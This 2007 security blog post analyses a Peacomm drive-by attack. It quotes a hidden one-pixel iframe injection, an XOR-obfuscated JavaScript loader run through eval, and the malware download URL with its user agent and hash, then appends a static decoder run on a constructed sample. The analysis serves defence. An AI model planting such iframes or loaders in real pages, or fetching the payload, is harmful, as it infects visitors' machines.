Saturday, September 01, 2007

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:
<iframe src="http://kqfloat.com/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
I spent a few minutes looking at the code this evening...
Downloads XORed JavaScript (like usual) ->

function xor_str(plain_str, xor_key){
    var xored_str = "";
    for (var i = 0 ; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
function kaspersky(suck,dick){};
function kaspersky2(suck_dick,again){};
var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the user agent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)
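
One way to read this layer without running it, as an added example that is not part of the original post: it pulls the plain_str literal and the numeric key out of a script shaped like the one above and XORs it back to text instead of calling eval. The sample script, its inner payload and the example.invalid URL are constructed, and decodeLayer and unescapeLiteral are names chosen here.

```javascript
// Added example (not from the original post). Static decode only: nothing is eval()'d.

// Same transform as the sample's xor_str(); XOR with the same key is its own inverse.
function xorStr(s, key) {
  let out = "";
  for (let i = 0; i < s.length; ++i) out += String.fromCharCode(key ^ s.charCodeAt(i));
  return out;
}

// Convert the body of a JS string literal (\xNN, \uNNNN, \n, \" ...) to raw characters.
function unescapeLiteral(body) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", 0: "\0" };
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (m, x, u, c) => (x || u) ? String.fromCharCode(parseInt(x || u, 16))
                             : (c in simple ? simple[c] : c));
}

// Find `var plain_str = "..."` and `xor_str(plain_str, <key>)` in the script text,
// then return the decoded layer and any URLs it mentions. Returns null when the
// script does not match this pattern.
function decodeLayer(script) {
  const lit = /var\s+plain_str\s*=\s*(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1/.exec(script);
  const call = /xor_str\s*\(\s*plain_str\s*,\s*(\d+)\s*\)/.exec(script);
  if (!lit || !call) return null;
  const key = Number(call[1]);
  const decoded = xorStr(unescapeLiteral(lit[2]), key);
  return { key, decoded, urls: decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [] };
}

// Constructed sample: a harmless inner script, XORed with key 200 and written
// as \xNN escapes, wrapped in the same tail the post shows.
const CONSTRUCTED_INNER = 'var u = "http://example.invalid/constructed.bin";';
const CONSTRUCTED_SCRIPT = 'var plain_str = "' +
  Array.from(xorStr(CONSTRUCTED_INNER, 200),
             c => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("") +
  '";\nvar xored_str = xor_str(plain_str, 200); eval(xored_str);';

console.log(decodeLayer(CONSTRUCTED_SCRIPT));
```
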
